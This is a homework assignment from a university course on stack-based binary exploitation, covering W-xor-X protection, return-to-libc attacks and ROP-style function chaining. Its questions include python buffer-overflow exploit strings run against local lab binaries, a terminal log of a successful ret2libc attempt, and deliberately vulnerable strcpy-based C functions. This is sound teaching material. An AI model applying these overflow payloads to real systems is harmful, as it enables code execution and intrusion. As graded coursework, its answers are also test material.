SI485H: Stack Based Binary Exploits (SP17)


Home Policy Calendar Units Assignments Resources

HW 8: W-xor-X

Instructions

  • You must turn in a sheet of paper that is neatly typed or written answering the questions below. (You are strongly encouraged to type your homework.)
  • This homework is graded out of 70 points. Point values are associated to each question.

Questions

  1. (5 points) Explain the principle of w-⊗-x as a way to protect against stack smashing attacks that load shell code.
  2. (5 points) What gcc compilation is used to tunr off w-xor-x?
  3. (5 points) What is a return-to-libc attack?
  4. (5 points) What c-library function is typically called when performing a return-to-libc attack? Why do we choose this one?
  5. (5 points) Explain the error output and how we know that this was a successful exploit.

    user@si485H-base:demo$ ./vulnerable 10 `python -c "print 'A'*(0x2c+4)+'\x90\xa1\xe5\xb7'"`
    sh: 1: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA???: not found
    Segmentation fault (core dumped)
    
  6. (10 points) Draw the stack diagram for the function below after ret2libc attack is executed properly. Use the diagram to explain how you control the argument in a ret2libc attack.

    void vuln(int i, char * s){
    
      char buf[20];
      strcpy(buf,s);
    
      while(i-- > 0)
        printf("%d: %s\n",i,buf);
    
      return;
    }
    
  7. (5 points) Suppose you're exploiting the function below. You know that the value of s is 0xbfff625. Provide an exploit string for a re2libc attack that will launch a shell.

    void vuln(char * s){
    
      char buf[20];
      strcpy(buf,s);
    
      while(i-- > 0)
        printf("%d: %s\n",i,buf);
    
      return;
    }
    
  8. (5 point) If the function bad() is at address 0x0804847d and the address of good() is at address 0x0804852a, what order of functions results from the exploit string:

    ./prog `python -c "print 'A'*(0x6c+4) + '\x7d\x84\x04\x08' + '\x2a\x85\x04\x08' + '\x2a\x85\x04\x08' + '\x7d\x84\x04\x08'"`
    
  9. (5 point) Consider that the function bad() is defined as following:

    void bad(int a){printf("%#08x\n",a);}
    

    and good() is defined as following

    void good(){printf("Go Navy!\n");}
    

    What is the output given the exploit string if good() and bad() is at the same location as before?

    ./prog `python -c "print 'A'*(0x6c+4) + '\x7d\x84\x04\x08' + '\x2a\x85\x04\x08' + '\xbe\xba\xfe\xca' + '\xef\xbe\xad\xde'"`
    
  10. (5 point) Consider that the function bad() is defined as following:

    void bad(int a, int b){printf("%#08x %#08x\n",a,b);}
    

    And good() is defined the same as before, what will the output of the program be?

    ./prog `python -c "print 'A'*(0x6c+4) + '\x7d\x84\x04\x08' + '\x2a\x85\x04\x08' + '\xbe\xba\xfe\xca' + '\xef\xbe\xad\xde'"`
    
  11. (5 points) Given the definition of bad(int a, int b) and good() from above, why can we not create a exploit string where we call bad(0xcafebabe,0xdeadbeef) then good() and then bad() again such that this time bad(0xbadf00d,0xfeed3e3e) is called?
  12. (5 points) If we were to write an exploit string to do the sequence of function calls as desired above (ie, bad(0xcafebabe), good(0xdeadbeef), then bad(0xbadf00d,0xfeed3e3e)): What gadget would we need?
  13. (5 points) Assuming the gadget was at memory address 0x080485a9,complete the exploit string to do the desired sequence of function calls.